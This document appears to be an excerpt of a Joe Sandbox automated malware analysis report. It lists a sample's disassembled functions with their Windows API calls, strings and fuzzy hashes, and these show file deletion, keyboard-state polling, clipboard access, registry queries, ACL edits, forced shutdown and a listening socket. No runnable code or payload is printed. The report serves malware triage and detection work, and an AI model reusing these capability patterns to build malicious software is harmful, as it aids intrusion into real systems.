Instruction ID: a7751d4d2edb27071b4e1147e43cf6df857456f4d4b9403f22c3824cb496d8e5
Opcode Fuzzy Hash: 29a46417e0f4df5a949e4cafd19fc51f84d51457b4fb53f36ac74a8497dd9ada
Instruction Fuzzy Hash: 4F31E87150121A6BCF10ABB4DC49EEE77AE9F06310F1003A5F911EB190FB74DB868B64

Function 00681C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00681CAB
_wcscmp.LIBCMT ref: 00681CC0
_wcscmp.LIBCMT ref: 00681CD7

Part of subcall function 00676BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00676BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00681D06
FindClose.KERNEL32(00000000), ref: 00681D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00681D2D
_wcscmp.LIBCMT ref: 00681D54
_wcscmp.LIBCMT ref: 00681D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00681D7D
SetCurrentDirectoryW.KERNEL32(006E39FC), ref: 00681D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00681DA5
FindClose.KERNEL32(00000000), ref: 00681DB2
FindClose.KERNEL32(00000000), ref: 00681DC2

Strings

*.*, xrefs: 00681D28

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: df3bfd53029589017f9fd6a55ce15db9bb775feb8ea2e434ecf3804bce96322e
Instruction ID: 8898fd8ca984bf6248131a8ed3bc2afd3305c7d144bf9d732fdd5a8557656f65
Opcode Fuzzy Hash: df3bfd53029589017f9fd6a55ce15db9bb775feb8ea2e434ecf3804bce96322e
Instruction Fuzzy Hash: D531E57150061A6ACF10BBA4DC49FEE77AF9F06320F100795F911AB291EB70DB868B54

Function 00637D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00637DBD

Strings

\, xrefs: 00637E1D
^, xrefs: 00637D96
[, xrefs: 00637E14
Q\E, xrefs: 006386D6
\b(?=\w), xrefs: 006AF85E
], xrefs: 00637D9F
\, xrefs: 00637D89
[:<:]], xrefs: 00637D1D
\, xrefs: 006AF95B
[:>:]], xrefs: 00637D37
\b(?<=\w), xrefs: 006AF877

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 0e5473babe9529a0b4c77691fc42d0338987fa1c035db948f1c288893d4e6a4e
Instruction ID: c42c68ecc359c9fc468a9dad4e4993c2400a13a98c94b3ad2fe653ccf927cc27
Opcode Fuzzy Hash: 0e5473babe9529a0b4c77691fc42d0338987fa1c035db948f1c288893d4e6a4e
Instruction Fuzzy Hash: 1A82AEB1D04219DFDB24DF98C8806EDBBB3BF49310F2581A9D819AB351E7749E81CB91

Function 0068091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006809DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 006809EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006809FB
__wsplitpath.LIBCMT ref: 00680A59
_wcscat.LIBCMT ref: 00680A71
_wcscat.LIBCMT ref: 00680A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00680A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00680AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00680ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00680AFF
_wcscpy.LIBCMT ref: 00680B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00680B4A

Strings

*.*, xrefs: 00680B05

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3541b85b1ba704192d5e6f08100e3b05250d162e0dafdc40fcb1c8d4aa440a38
Instruction ID: 62e4323f43b4b182888109854683bbbcb292ff238c218a7e3623563173a2355e
Opcode Fuzzy Hash: 3541b85b1ba704192d5e6f08100e3b05250d162e0dafdc40fcb1c8d4aa440a38
Instruction Fuzzy Hash: 5E616DB25043059FDB50EF60C84499EB3EAFF89310F044A5DF989C7252DB31EA49CB96

Function 0066A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0066ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0066ABD7
Part of subcall function 0066ABBB: GetLastError.KERNEL32(?,0066A69F,?,?,?), ref: 0066ABE1
Part of subcall function 0066ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0066A69F,?,?,?), ref: 0066ABF0
Part of subcall function 0066ABBB: HeapAlloc.KERNEL32(00000000,?,0066A69F,?,?,?), ref: 0066ABF7
Part of subcall function 0066ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0066AC0E

Part of subcall function 0066AC56: GetProcessHeap.KERNEL32(00000008,0066A6B5,00000000,00000000,?,0066A6B5,?), ref: 0066AC62
Part of subcall function 0066AC56: HeapAlloc.KERNEL32(00000000,?,0066A6B5,?), ref: 0066AC69
Part of subcall function 0066AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0066A6B5,?), ref: 0066AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0066A6D0
_memset.LIBCMT ref: 0066A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0066A704
GetLengthSid.ADVAPI32(?), ref: 0066A715
GetAce.ADVAPI32(?,00000000,?), ref: 0066A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0066A76E
GetLengthSid.ADVAPI32(?), ref: 0066A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0066A79A
HeapAlloc.KERNEL32(00000000), ref: 0066A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0066A7C2
CopySid.ADVAPI32(00000000), ref: 0066A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0066A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0066A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0066A834

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 2dad963f297fb912f15f419a33aa024e7eeb3e086362a2952985b1cea5d639a6
Instruction ID: 298be117b1074fb1fe6876e6dbaed5add95da8f2834408a9fb321beadbefb3ba
Opcode Fuzzy Hash: 2dad963f297fb912f15f419a33aa024e7eeb3e086362a2952985b1cea5d639a6
Instruction Fuzzy Hash: 08514DB5900209AFDF10DF95DC85AEEBBBAFF04300F048169F911AB291EB359A45CF61

Function 00636F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

m, xrefs: 00636F77
ANYCRLF), xrefs: 006B2E7D
CR), xrefs: 006B2E09
ANY), xrefs: 006B2E60
BSR_UNICODE), xrefs: 006B2EBA
CRLF), xrefs: 006B2E43
NO_AUTO_POSSESS), xrefs: 006B2CB0
UTF16), xrefs: 006B2C56
LF), xrefs: 006B2E26
UCP), xrefs: 006B2C8F
LIMIT_MATCH=, xrefs: 006B2CF2
NO_START_OPT), xrefs: 006B2CD1
UTF), xrefs: 006B2C7C
BSR_ANYCRLF), xrefs: 006B2EA0
LIMIT_RECURSION=, xrefs: 006B2D7E
mmm m, xrefs: 00637096, 0063709C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID: m$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$mmm m
API String ID: 0-3520992314
Opcode ID: 115f450356e9bcea23428eb8ea2266a61a7dcaeffa6e544c197f5d5a6b6ce9d9
Instruction ID: 80ae6590185eac09cfdf4b431c4b0aaa7b2b3c5932b0446b690e9c955033c054
Opcode Fuzzy Hash: 115f450356e9bcea23428eb8ea2266a61a7dcaeffa6e544c197f5d5a6b6ce9d9
Instruction Fuzzy Hash: A67251B1E0422A9BDB24CF59D8507EEB7F6BF48310F14416AE815EB381DB709E81DB94

Function 006763F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00676EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00675FA6,?), ref: 00676ED8

Part of subcall function 006772CB: GetFileAttributesW.KERNEL32(?,00676019), ref: 006772CC

_wcscat.LIBCMT ref: 00676441
__wsplitpath.LIBCMT ref: 0067645F
FindFirstFileW.KERNEL32(?,?), ref: 00676474
_wcscpy.LIBCMT ref: 006764A3
_wcscat.LIBCMT ref: 006764B8
_wcscat.LIBCMT ref: 006764CA
DeleteFileW.KERNEL32(?), ref: 006764DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 006764EB
FindClose.KERNEL32(00000000), ref: 00676506

Strings

\*.*, xrefs: 0067643B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: e10f9f3e24da7cb8f2ceb062d0b90e1225b0e161842b921f31d8f9f787c9368e
Instruction ID: d7626ce4d56b724c83b8f2da672f51d01d9524ea795fda97b47de9b3ba555f7f
Opcode Fuzzy Hash: e10f9f3e24da7cb8f2ceb062d0b90e1225b0e161842b921f31d8f9f787c9368e
Instruction Fuzzy Hash: BE31C5B24083849AD721DBA4C885DDB77EDAF56310F044A2EF9D8C3141FA35D54D87A7

Function 006931BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00693C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00692BB5,?,?), ref: 00693C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0069328E

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0069332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006933C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00693604
RegCloseKey.ADVAPI32(00000000), ref: 00693611

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 762a19f381710aceb56fda98789aabfd6f70f4ebe6b2b1f52f7b0532b00c66fb
Instruction ID: b931f4a1293a1c3709a9b9887becd40547985a87e60efb3b034e5a1c2c0682df
Opcode Fuzzy Hash: 762a19f381710aceb56fda98789aabfd6f70f4ebe6b2b1f52f7b0532b00c66fb
Instruction Fuzzy Hash: 63E15E71604210AFCB54DF28C995E6ABBEAEF88714F04856DF44ADB361DB30ED05CB92

Function 00672B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00672B5F
GetAsyncKeyState.USER32(000000A0), ref: 00672BE0
GetKeyState.USER32(000000A0), ref: 00672BFB
GetAsyncKeyState.USER32(000000A1), ref: 00672C15
GetKeyState.USER32(000000A1), ref: 00672C2A
GetAsyncKeyState.USER32(00000011), ref: 00672C42
GetKeyState.USER32(00000011), ref: 00672C54
GetAsyncKeyState.USER32(00000012), ref: 00672C6C
GetKeyState.USER32(00000012), ref: 00672C7E
GetAsyncKeyState.USER32(0000005B), ref: 00672C96
GetKeyState.USER32(0000005B), ref: 00672CA8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 9c405d296d79650ee324866f15af7bc8b0817d4ecaf660827bd4cc4ae5a11451
Instruction ID: 4ff1c96fd45882be1fabc6a8d9e57dbad44dc89ecccc722512fe43d00a2ef167
Opcode Fuzzy Hash: 9c405d296d79650ee324866f15af7bc8b0817d4ecaf660827bd4cc4ae5a11451
Instruction Fuzzy Hash: 1C41E7705047CB6DFF769B6488247F9BEA2AF31708F04C059D5CA5A3C2EB9499C4C7A2

Function 00686D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00686D2E
EmptyClipboard.USER32 ref: 00686D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00686D49
CloseClipboard.USER32 ref: 00686DE8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2f5fb1ec20c3b98a4de68b4febd95ebe5bee40ef9d5605ef29c44f6d91ca47e5
Instruction ID: a0eddfb950c0433e063cc1e1042de649715b09bde81ac75d2d571d24be67e46a
Opcode Fuzzy Hash: 2f5fb1ec20c3b98a4de68b4febd95ebe5bee40ef9d5605ef29c44f6d91ca47e5
Instruction Fuzzy Hash: DA21AE71300111AFDB11AF64DD59B6DB7ABEF04711F049119F90ADF2A1EB34ED418B94

Function 0068C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00669ABF: CLSIDFromProgID.OLE32 ref: 00669ADC
Part of subcall function 00669ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00669AF7
Part of subcall function 00669ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00669B05
Part of subcall function 00669ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00669B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0068C235
_memset.LIBCMT ref: 0068C242
_memset.LIBCMT ref: 0068C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0068C38C
CoTaskMemFree.OLE32(?), ref: 0068C397

Strings

NULL Pointer assignment, xrefs: 0068C3E5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 034b08ab59944febd415d9cd9c6cb0145fdf3f72b9dc2ec73ff8f71732bdc100
Instruction ID: 013a78b15c14d3e6c86fd29dacce8408ef287ec93f90184a82e7e80f9d1354e6
Opcode Fuzzy Hash: 034b08ab59944febd415d9cd9c6cb0145fdf3f72b9dc2ec73ff8f71732bdc100
Instruction Fuzzy Hash: C7913E71D00218AFDB10EF94DC95EDEBBBAEF04720F10815AF515A7281EB705A45CFA4

Function 006779D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0066B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0066B180
Part of subcall function 0066B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0066B1AD
Part of subcall function 0066B134: GetLastError.KERNEL32 ref: 0066B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00677A0F

Strings

, xrefs: 006779FD
@, xrefs: 00677A02
SeShutdownPrivilege, xrefs: 006779DD

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 09fbe7c236624cae9dec0abbef0cc86f7aab9828d9095c3b937b3c7c9e4f03e3
Instruction ID: 8afa7094ac843632f532f3205912002ee7cba8aa5765adb11fa4cf7f15eb455d
Opcode Fuzzy Hash: 09fbe7c236624cae9dec0abbef0cc86f7aab9828d9095c3b937b3c7c9e4f03e3
Instruction Fuzzy Hash: FC012B716593226AF7286678CC4ABFF735B9B00340F149524FE07E21C2EAA15F0181B4

Function 00688C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00688CA8
WSAGetLastError.WSOCK32(00000000), ref: 00688CB7
bind.WSOCK32(00000000,?,00000010), ref: 00688CD3
listen.WSOCK32(00000000,00000005), ref: 00688CE2
WSAGetLastError.WSOCK32(00000000), ref: 00688CFC
closesocket.WSOCK32(00000000,00000000), ref: 00688D10

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 47e28b58fa404b8bb5806c662d6381d0f6e461d282be0d3c1de1936d223cc91a
Instruction ID: 79641b19bc8a69e3812f8a2820bcbdb8a62f04d924a5e4a6b681a3660f75b11b
Opcode Fuzzy Hash: 47e28b58fa404b8bb5806c662d6381d0f6e461d282be0d3c1de1936d223cc91a
Instruction Fuzzy Hash: 7121B6716001019FC750FF68D985BAEB7ABEF48310F10825CF916AB3D1DB70AD418B65

Function 00676532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00676554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00676564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00676583
__wsplitpath.LIBCMT ref: 006765A7
_wcscat.LIBCMT ref: 006765BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 006765F9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 4b1ef61d0ff5e5b81b7ef0f2d445cc36f8ba272f4e6bead7a7ec2e598be3aef8
Instruction ID: dc896a9756a7539cf6bb06730a6be00bf6b74f051ef0b31594fa3e4b9995c180
Opcode Fuzzy Hash: 4b1ef61d0ff5e5b81b7ef0f2d445cc36f8ba272f4e6bead7a7ec2e598be3aef8
Instruction Fuzzy Hash: A82187B1900219ABEB10ABA4CD88FDDB7BEAB45300F5045E9F509E7241E7719F85DF60

Function 00639B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00639C32
m, xrefs: 00639CF3
VUUU, xrefs: 00639ED4
VUUU, xrefs: 006BBE14
VUUU, xrefs: 00639E95
VUUU, xrefs: 00639EA7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$m
API String ID: 0-2899441276
Opcode ID: 30bf998963ec04300e3c92c1c6971963128ed18acb21ca290c43e08a25ae2a51
Instruction ID: 1f21f4165e2bf635245c8cc84991afa0653daed53c8fcfe103dfcadb078b95d2
Opcode Fuzzy Hash: 30bf998963ec04300e3c92c1c6971963128ed18acb21ca290c43e08a25ae2a51
Instruction Fuzzy Hash: 2D923BB1E0421ACBDF24CF98C8507EDB7B3AB54314F14819AE856AB380D7B59E81DF91

Function 006713CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006713DC

Strings

,2n, xrefs: 006716B1
<2n, xrefs: 006716FA
